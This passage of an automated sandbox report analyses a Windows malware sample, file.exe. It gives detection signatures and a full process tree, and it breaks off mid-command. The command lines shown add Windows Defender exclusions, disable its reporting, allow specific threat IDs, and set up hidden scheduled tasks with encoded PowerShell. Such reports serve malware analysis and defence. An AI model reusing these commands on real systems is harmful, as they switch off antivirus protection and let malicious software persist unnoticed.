Windows Analysis Report
file.exe
Overview
General Information
Detection
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5428 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
- Install.exe (PID: 2620 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
- Install.exe (PID: 3408 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
- forfiles.exe (PID: 5112 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
- conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5704 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
- reg.exe (PID: 5752 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- reg.exe (PID: 4644 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- forfiles.exe (PID: 5640 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
- conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5696 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
- reg.exe (PID: 3128 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- Conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- reg.exe (PID: 1412 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
- schtasks.exe (PID: 5792 cmdline: schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 5992 cmdline: schtasks /run /I /tn "gbyyEslRl" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 2068 cmdline: schtasks /DELETE /F /TN "gbyyEslRl" MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- schtasks.exe (PID: 1920 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6060 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpupdate.exe (PID: 2108 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
- conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpscript.exe (PID: 5816 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
- pdyDoIJ.exe (PID: 2384 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
- powershell.exe (PID: 3560 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Pol